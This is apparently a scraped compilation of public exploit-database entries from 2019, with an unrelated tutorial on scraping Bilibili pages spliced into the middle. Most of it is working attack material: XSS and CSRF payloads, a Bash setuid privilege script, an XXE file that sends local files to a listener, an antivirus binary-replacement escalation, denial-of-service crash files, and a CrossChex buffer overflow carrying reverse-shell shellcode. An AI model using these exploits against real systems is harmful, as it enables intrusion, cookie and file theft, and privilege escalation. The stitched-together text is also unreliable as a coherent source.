# Exploit Title: Online Inventory Manager 3.2 - Persistent Cross-Site Scripting # Date: 2019-11-29 # Exploit Author: Cemal Cihad ÇİFTÇİ # Vendor Homepage: https://bigprof.com # Software Link : https://bigprof.com/appgini/applications/online-inventory-manager # Software : Online Inventory Manager # Version : 3.2 # Vulernability Type : Cross-site Scripting # Vulenrability : Stored XSS # Tested on: Windows 10 Pro # Stored XSS has been discovered in the Online Inventory Manager created by bigprof/AppGini # editgroups section. In editgroups section # (http://localhost/inventory/admin/pageEditGroup.php?groupID=1). # Payload i used: "><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>" # POC: http://localhost/inventory/admin/pageViewGroups.php in this # url you can edit the groups information with pressing onto the group name. After the edit page open # you can enter your payload into the description field. After going back to # the groups page you will see your Javascript code gonna run. # This vulnerability is also exist while you are creating a new group.

# Exploit Title : Bash 5.0 Patch 11 - SUID Priv Drop Exploit # Date : 2019-11-29 # Original Author: Ian Pudney , Chet Ramey # Exploit Author : Mohin Paramasivam (Shad0wQu35t) # Version : < Bash 5.0 Patch 11 # Tested on Linux # Credit : Ian Pudney from Google Security and Privacy Team based on Google CTF suidbash # CVE : 2019-18276 # CVE Link : https://nvd.nist.gov/vuln/detail/CVE-2019-18276 , https://www.youtube.com/watch?v=-wGtxJ8opa8 # Exploit Demo POC : https://youtu.be/Dbwvzbb38W0 Description : An issue was discovered in disable_priv_mode in shell.c in GNU Bash through 5.0 patch 11. By default, if Bash is run with its effective UID not equal to its real UID, it will drop privileges by setting its effective UID to its real UID. However, it does so incorrectly. On Linux and other systems that support "saved UID" functionality, the saved UID is not dropped. An attacker with command execution in the shell can use "enable -f" for runtime loading of a new builtin, which can be a shared object that calls setuid() and therefore regains privileges. However, binaries running with an effective UID of 0 are unaffected. #!/bin/bash #Terminal Color Codes RED='\033[0;31m' GREEN='\033[0;32m' NC='\033[0m' #Get the Effective User ID (owner of the SUID /bin/bash binary) read -p "Please enter effective user id (euid) : " euid #Create a C file and output the exploit code touch pwn.c echo "" > pwn.c cat <<EOT >> pwn.c #include <sys/types.h> #include <unistd.h> #include <stdio.h> void __attribute((constructor)) initLibrary(void) { printf("Escape lib is initialized"); printf("[LO] uid:%d | euid:%d%c", getuid(), geteuid()); setuid($euid); printf("[LO] uid%d | euid:%d%c", getuid(), geteuid()); } EOT echo -e "${RED}" echo -e "Exploit Code copied to pwn.c !\n" sleep 5 echo -e "Compiling Exploit Object ! \n" $(which gcc ) -c -fPIC pwn.c -o pwn.o sleep 5 echo -e "Compiling Exploit Shared Object ! \n" $(which gcc ) -shared -fPIC pwn.o -o libpwn.so sleep 5 echo -e "Exploit Compiled ! \n" sleep 5 echo -e "Executing Exploit :) \n" sleep 5 #Execute the Shared Library echo -e "${RED}Run : ${NC} enable -f ./libpwn.so asd \n"

# Exploit Title: Nsauditor 3.1.8.0 - 'Name' Denial of Service (PoC) # Discovery by: SajjadBnd # Date: 2019-11-30 # Vendor Homepage: http://www.nsauditor.com # Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe # Tested Version: 3.1.8.0 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows 10 - Pro # About App # Nsauditor Network Security Auditor is a powerful network security tool designed to scan networks and hosts for vulnerabilities, # and to provide security alerts.Nsauditor network auditor checks enterprise network for all potential methods that # a hacker might use to attack it and create a report of potential problems that were found , Nsauditor network auditing # software significantly reduces the total cost of network management in enterprise environments by enabling # IT personnel and systems administrators gather a wide range of information from all the computers in the network without # installing server-side applications on these computers and create a report of potential problems that were found. # PoC # 1.Run the python script, it will create a new file "dos.txt" # 3.Run Nsauditor and click on "Register -> Enter Registration Code" # 2.Paste the content of dos.txt into the Field: 'Name' # 6.click 'ok' # 5.Crashed ;) #!/usr/bin/env python buffer = "\x41" * 1000 try: f=open("dos.txt","w") print "[+] Creating %s bytes DOS payload.." %len(buffer) f.write(buffer) f.close() print "[+] File created!" except: print "File cannot be created"

In the previous article, we talked about using the web scraper browser plug-in to implement crawler. But my friend didn't understand, so we explained this article in depth. Hope it will be helpful to your study and work. Single page information crawl This is the most basic and simplest crawler. That is, all the desired information is on the same page and has not been paging. We just need to use web scraper to crawl directly. Example: Crawl the data in the B station rankings, including video titles Author Playbacks Number of barrages Click Create new sitemap to create a crawler. Next, click add new selector to create crawled content. Here I have created four of them, corresponding to the video titles Author Playback Number of Barrages` After the configuration is complete, click Scrape to start crawling. After the crawler is finished, export the results. After exporting, the data was found to be quite messy. This is because the corresponding four fields have the same priority. How to solve this problem? Know container The web scraper mentions the concept of containers, which is like a div in html. Put the same div in the page into the same container. Read data from a div from the container. The specific methods are as follows: Click Create new sitemap to create the container. Type Select Element Next, double-click the container to enter the container. Create the field you want to crawl again in the container. The overall structure is as follows The final crawler effect. Crawl Level 2 Page For example, in the case of appeal, we only obtained the number of views and the number of barrage. The number of likes and favorites in the B station is not presented. Instead, it is in the secondary page. At this time, we need to jump to the second page after crawling on the first page. The specific methods are as follows: Enter the container and select the title field type as link. (Click on the title to enter the secondary page) Double-click the title field to create fields that like and coin collection in this field. The final effect is as follows Crawl paging information In practice, a lot of information is paginated. For example, we crawl all the video information of the author on B. Crawl the regular next button. In many cases, we can observe the direct change pattern of the url by clicking the button and querying the response request. like Page 1 https://space.bilibili.com/430579369/video?tid=0pn=1keyword=order=pubdate Page 2 https://space.bilibili.com/430579369/video?tid=0pn=2keyword=order=pubdate Through observation, it is not difficult to find that by using pn=to control the operation of the button, we just need to add the corresponding variable to it. If there are ten pages of data in total, we can set it to pn=[1-10] Example: Crawl all videos of Xiaoyaozi Big Cousin. No rules For non-standard, we can use container simulation clicks to crawl. First, we create crawlers and containers. Next create the container The structure is as follows Crawling effect Summary It is completely possible to use web scraper to complete some simple crawler tasks. It is relatively simple to get started, but it may not work for some sites with anti-crawler mechanisms.

#Exploit Title: SpotAuditor 5.3.2 - 'Name' Denial Of Service #Exploit Author : ZwX #Exploit Date: 2019-11-28 #Vendor Homepage : http://www.nsauditor.com/ #Link Software : http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe #Tested on OS: Windows 7 #Social: twitter.com/ZwX2a #contact: msk4@live.fr ''' Proof of Concept (PoC): ======================= 1.Download and install SpotAuditor 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Register -> Enter Registration Code 4.Copy and paste the characters in the file (poc.txt) 5.Paste the characters in the field 'Name' and click on 'Ok' 6.SpotAuditor Crashed ''' #!/usr/bin/python http = "http//" buffer = "\x41" * 2000 poc = http + buffer file = open("poc.txt","w") file.write(poc) file.close() print "POC Created by ZwX"

# Exploit Title: Visual Studio 2008 - XML External Entity Injection # Discovery by: hyp3rlinx # Date: 2019-12-02 # Vendor Homepage: www.microsoft.com # Software Link: Visual Studio 2008 Express IDE # Tested Version: 2008 # CVE: N/A [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-VISUAL-STUDIO-EXPRESS-2008-IDE-XML-EXTERNAL-ENTITY-0Day.txt [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Visual Studio 2008 Express IDE vcsetup.exe File hash: 62f764849e8fcdf8bfbc342685641304 Download: http://go.microsoft.com/?linkid=7729279 [Vulnerability Type] XML External Entity Injection 0Day [CVE Reference] N/A [Security Issue] Visual Studio 2008 IDE suffers from XML External Entity injection. Attackers can leverage many file types, some being MASM related files like .asm or .lst. By opening any one of the following file types listed below, it can allow remote attackers to steal files from the victims computer, sending them to the remote attackers server. Double click any of the following extensions and it will trigger the XXE vulnerability. Note, upon installation of the IDE the following file types get associated with Visual Studio 2008 and are ALL vulnerable and will trigger the XXE exploit. [Vuln XXE file types] .snippet .i .s .asm .disco .lst .inc .srf .wsdl .rgs .xml This IDE is pretty old, I know, but its still available for download as of this writing, therefore I release the advisory. [References] https://devblogs.microsoft.com/visualstudio/end-of-support-for-visual-studio-2008-in-one-year/ [Exploit/POC] "Evil.snippet" or any of the extensions mentioned above. <?xml version="1.0"?> <!DOCTYPE knobgobslob [ <!ENTITY % file SYSTEM "C:\Windows\system.ini"> <!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd"> %dtd;]> <pwn>&send;</pwn> "payload.dtd" <?xml version="1.0" encoding="UTF-8"?> <!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>"> %all; python -m SimpleHTTPServer python -m http.server (Python3) [POC Video URL] https://www.youtube.com/watch?v=QOZlwzsbPrk [Network Access] Remote [Severity] High [Disclosure Timeline] Vendor Notification: 3/24/2017 MSRC sent me link to "Definition of a Security Vulnerability" Also Product is also not supported anymore. December 1, 2019 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

# Exploit Title: SmartHouse Webapp 6.5.33 - Cross-Site Request Forgery # Discovery by: LiquidWorm # Date: 2019-12-02 # Vendor Homepage: # Tested Version: 6.5.33.17072501 # CVE: N/A # Advisory ID: ZSL-2019-5543 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5543.php Carlo Gavazzi SmartHouse Webapp 6.5.33 CSRF/XSS Vulnerabilities Vendor: Carlo Gavazzi Automation S.p.A Product web page: http://www.gavazzi-automation.com | http://www.smarthouse.nu Affected version: Web-app: 6.5.33.17072501 Web-app: 6.5.32.17062101 Web-app: 6.2.3.16102701 Web-app: 5.5.3.160421101 Web-app: 5.3.3.15120101 Release: 1.0.5.1 Release: 1.0.5.0 Release: 1.0.3.5 Release: 1.0.3.2 Summary: Carlo Gavazzi is an international company that develops, manufactures and sells electrical automation components. Our products are used in industrial automation and real estate automation. Smart-house is based on a system that we have developed and produced since 1986, mainly for industrial-related installations. Our system is present in more than 150,000 installations. For a few years now, we have focused our development on smart electrical installations for home and property automation. Smart-house is currently installed in both villas and commercial properties. Desc: The application suffers from multiple CSRF and XSS vulnerabilities. The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Input passed to several GET/POST parameters is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Tested on: Apache PHP Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2019-5543 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5543.php 01.11.2019 -- Reflected XSS (GET): -------------------- 1. http://192.168.0.24/app/index.php?error=Waddup"><script>confirm(document.cookie)</script> (pre-auth) 2. http://192.168.0.24/app/messagepage.php?msg=<script>confirm(document.cookie)</script> (pre-auth) 3. http://192.168.0.24/app/detaf.php?p=0&l=50"><script>confirm(document.cookie)</script>&f=5658 (post-auth) 4. http://192.168.0.24/app/detaf.php?p=0"><script>confirm(document.cookie)</script>&l=50&f=5658 (post-auth) 5. http://192.168.0.24/?functionsh=list&part[]=fn__intrudermain001&part[]=fn__intrudersec002&name=IntruderMainFunction"><script>confirm(document.cookie)</script>&grpl=1 (post-auth) CSRF set temperature: --------------------- <html> <body> <form action="http://192.168.0.24/app/datasend.php" method="POST"> <input type="hidden" name="IDFunction" value="3875" /> <input type="hidden" name="favorite" value="0" /> <input type="hidden" name="rooms" value="-1" /> <input type="hidden" name="userId" value="-300" /> <input type="hidden" name="heat_ensave_set" value="24" /> <input type="hidden" name="heat_set" value="25.5" /> <input type="submit" value="Set" /> </form> </body> </html> Stored XSS (POST): ------------------ <html> <body> <form action="http://192.168.0.24/app/command.php" method="POST"> <input type="hidden" name="op" value="11" /> <input type="hidden" name="name" value='Graph name"><script>confirm(document.cookie)</script>' /> <input type="hidden" name="period" value="2" /> <input type="hidden" name="gg" value="6" /> <input type="hidden" name="ggf" value="6" /> <input type="hidden" name="mm" value="11" /> <input type="hidden" name="mmf" value="11" /> <input type="hidden" name="aa" value="2019" /> <input type="hidden" name="aaf" value="2019" /> <input type="hidden" name="param" value="[1]" /> <input type="submit" value="Send" /> </form> </body> </html> Reflected XSS (POST): --------------------- <html> <body> <form action="http://192.168.0.24/refresh.php"> <input type="hidden" name="param[0][]" value="switch0251<script>confirm(document.cookie)</script>" /> <input type="hidden" name="param[0][]" value="0251" /> <input type="hidden" name="param[0][]" value="switch" /> <input type="hidden" name="param[1][]" value="switch1250" /> <input type="hidden" name="param[1][]" value="1250" /> <input type="hidden" name="param[1][]" value="switch" /> <input type="submit" value="Send" /> </form> </body> </html>

# Exploit Title: Nsauditor 3.1.8.0 - 'Key' Denial of Service (PoC) # Discovery by: SajjadBnd # Date: 2019-11-30 # Vendor Homepage: http://www.nsauditor.com # Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe # Tested Version: 3.1.8.0 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows 10 - Pro # Email : blackwolf@post.com # About App # Nsauditor Network Security Auditor is a powerful network security tool designed to scan networks # and hosts for vulnerabilities, and to provide security alerts.Nsauditor network auditor checks enterprise # network for all potential methods that a hacker might use to attack it and create a report of potential # problems that were found , Nsauditor network auditing software significantly reduces the total cost of # network management in enterprise environments by enabling IT personnel and systems administrators gather # a wide range of information from all the computers in the network without installing server-side applications # on these computers and create a report of potential problems that were found. # POC # 1.Run the python script, it will create a new file "dos.txt" # 3.Run Nsauditor and click on "Register -> Enter Registration Code" # 2.Paste the content of dos.txt into the Field: 'Key' # 6.click 'ok' # 5.Crashed ;) #!/usr/bin/env python buffer = "\x41" * 1000 try: f=open("dos.txt","w") print "[+] Creating %s bytes DOS payload.." %len(buffer) f.write(buffer) f.close() print "[+] File created!" except: print "File cannot be created"

# Exploit Title: Max Secure Anti Virus Plus 19.0.4.020 - Insecure File Permissions # Discovery by: hyp3rlinx # Date: 2019-12-02 # Vendor Homepage: www.maxpcsecure.com # Tested Version: 19.0.4.020 # CVE: N/A [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MAX-SECURE-PLUS-ANTIVIRUS-INSECURE-PERMISSIONS.txt [+] ISR: ApparitionSec [Vendor] www.maxpcsecure.com [Affected Product Code Base] Max Secure Anti Virus Plus - 19.0.4.020 File hash: ab1dda23ad3955eb18fdb75f3cbc308a msplusx64.exe [Vulnerability Type] Insecure Permissions [CVE Reference] N/A [Security Issue] Max Secure Anti Virus Plus 19.0.4.020 has Insecure Permissions on the installation directory. Local attackers or malware running at low integrity can replace a .exe or .dll file to achieve privilege escalation. C:\Program Files\Max Secure Anti Virus Plus>cacls * | more C:\Program Files\Max Secure Anti Virus Plus\7z.dll NT AUTHORITY\Authenticated Users:(ID)F BUILTIN\Users:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Administrators:(ID)F [Affected Component] Permissions on installation directory [Exploit/POC] #include <stdio.h> #include <windows.h> #define TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxSDUI.exe" #define TMP "C:\\Program Files\\Max Secure Anti Virus Plus\\2.exe" #define DISABLED_TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\666.tmp" /* Max Secure Anti Virus Plus PoC By hyp3rlinx */ BOOL PWNED=FALSE; BOOL FileExists(LPCTSTR szPath){ DWORD dwAttrib = GetFileAttributes(szPath); return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY)); } void main(void){ if(!FileExists(DISABLED_TARGET)){ CopyFile(TARGET, TMP, FALSE); Sleep(1000); CopyFile(TMP, DISABLED_TARGET, FALSE); printf("[+] Max Secure Anti Virus Plus EoP PoC\n"); Sleep(1000); printf("[+] Disabled MaxSDUI.exe ...\n"); Sleep(300); }else{ PWNED=TRUE; } if(!PWNED){ char fname[MAX_PATH]; char newLoc[]=TARGET; DWORD size = GetModuleFileNameA(NULL, fname, MAX_PATH); if (size){ printf("[+] Copying exploit to vuln dir...\n"); Sleep(1000); CopyFile(fname, TARGET, FALSE); printf("[+] Replaced legit Max Secure EXE...\n"); Sleep(2000); printf("[+] Done!\n"); MoveFile(fname, "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxPwn.lnk"); Sleep(1000); exit(0); } }else{ if(FileExists(TMP)){ remove(TMP); } printf("[+] Max Secure Anti Virus Plus PWNED!!!\n"); printf("[+] hyp3rlinx\n"); system("pause"); } } [POC Video URL] https://www.youtube.com/watch?v=DXSV5geXkTw [Network Access] Local [Severity] High [Disclosure Timeline] Vendor Notification: November 19, 2019 Vendor: "received a reply they will fix soon" Status request: November 24, 2019 No replies other than automated response. November 29, 2019 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

# Exploit Title: Dokuwiki 2018-04-22b - Username Enumeration # Date: 2019-12-01 # Exploit Author: Talha ŞEN # Vendor Homepage: https://www.dokuwiki.org/dokuwiki # Software Link: https://download.dokuwiki.org/ # Version: 2018-04-22b "Greebo" # Tested on: # Alpine Linux 3.5 (docker image) # PHP 5.6.30 # Apache/2.4.25 (Unix) # CVE : # At login page there is a "set new password" page as below: # Forgotten your password? Get a new one: Set new password # At this page there is username enumeration vulnerability. # Testing for non-valid user: POST /doku.php?id=start&do=resendpwd HTTP/1.1 sectok=&do=resendpwd&save=1&login=sss # Response for non-valid user(sss): <div class="error">Sorry, we can't find this user in our database.</div> ======================================================================== # Testing for valid user: POST /doku.php?id=start&do=resendpwd HTTP/1.1 sectok=&do=resendpwd&save=1&login=admin # Response for valid user (admin): <div class="error">There was an unexpected problem communicating with SMTP: Could not open SMTP Port.</div> <div class="error">Looks like there was an error on sending the password mail. Please contact the admin!</div>

# Exploit Title: Anviz CrossChex 4.3.12 - Local Buffer Overflow # Date: 2019-11-30 # Exploit Author: Luis Catarino & Pedro Rodrigues # Vendor Homepage: https://www.anviz.com/ # Software Link: https://www.anviz.com/download.html # Version: Crosschex Standard x86 <= V4.3.12 # Tested on: 4.3.8.0, 4.3.12 # CVE : N/A # More info: https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html import socket import time import sys import binascii # Scapy for the broadcast packet with custom sport from scapy.all import Raw,IP,Dot1Q,UDP,Ether import scapy.all # shellcode working calc.exe calculator_payload = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b" calculator_payload += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7" calculator_payload += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf" calculator_payload += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c" calculator_payload += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01" calculator_payload += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31" calculator_payload += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d" calculator_payload += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66" calculator_payload += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0" calculator_payload += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f" calculator_payload += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00" calculator_payload += b"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5" calculator_payload += b"\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a" calculator_payload += b"\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53" calculator_payload += b"\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00" # shellcode windows x86 reverse_shell shell_payload_1 = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b" shell_payload_1 += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7" shell_payload_1 += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf" shell_payload_1 += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c" shell_payload_1 += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01" shell_payload_1 += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31" shell_payload_1 += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d" shell_payload_1 += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66" shell_payload_1 += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0" shell_payload_1 += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f" shell_payload_1 += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68" shell_payload_1 += b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8" shell_payload_1 += b"\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00" shell_payload_1 += b"\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f" shell_payload_1 += b"\xdf\xe0\xff\xd5\x97\x6a\x05\x68" # shellcode windows x86 reverse_shell (part_2) shell_payload_2 = b"\x68\x02\x00\x01\xbd\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5" shell_payload_2 += b"\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec" shell_payload_2 += b"\x68\xf0\xb5\xa2\x56\xff\xd5\x68\x63\x6d\x64\x00\x89" shell_payload_2 += b"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66" shell_payload_2 += b"\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44" shell_payload_2 += b"\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68" shell_payload_2 += b"\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30" shell_payload_2 += b"\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68" shell_payload_2 += b"\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0" shell_payload_2 += b"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5" def ipToShellcode(ip): a = ip.split('.') b = hex(int(a[0])) + hex(int(a[1])) + hex(int(a[2])) + hex(int(a[3])) b = b.replace("0x","") return binascii.unhexlify(b) # sport has to be 5060 def sendFuzzingUDPBroadcast(ip="255.255.255.255", sport=5050, dport=5060): request = b"A"*77 # Original payload substitute request += b"B"*184 request += b"\x07\x18\x42\x00" # EIP - 00421807 crosscheck_standard.exe request += b"A"*4 # 269 bytes if len(sys.argv) > 2: request = request + shell_payload_1 + ipToShellcode(sys.argv[2]) + shell_payload_2 else: request = request + calculator_payload scapy.all.sendp( Ether(src='00:00:00:00:00:00', dst="ff:ff:ff:ff:ff:ff")/IP(src=ip,dst='255.255.255.255')/UDP(sport=sport,dport=dport)/Raw(load=request), iface=sys.argv[1] ) def setFuzzUDPServer(ip='', port=5050, timeout=150): try : s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) except: print('[!] Failed to create server socket') try: s.bind(('', port)) except: print('[*] Server socket bind failed') sys.exit() print('[*] Waiting for crosschex') s.settimeout(timeout) timeout = time.time() + timeout responses = [] while True: if time.time() > timeout: break try: response = s.recvfrom(1024) print(response) responses.append(response) sendFuzzingUDPBroadcast(ip=ip) response = s.recvfrom(1024) except socket.timeout: print("[!] Error with UDP server") s.close() return responses nargs = len(sys.argv) if nargs < 2: print("[*] Usage: python3 %s <network_interface> [<ip>]\n\tif you don't pass the ip of the LHOST it will drop a calculator, if you set the ip it will send a reverse shell to port 445") sys.exit(0) setFuzzUDPServer()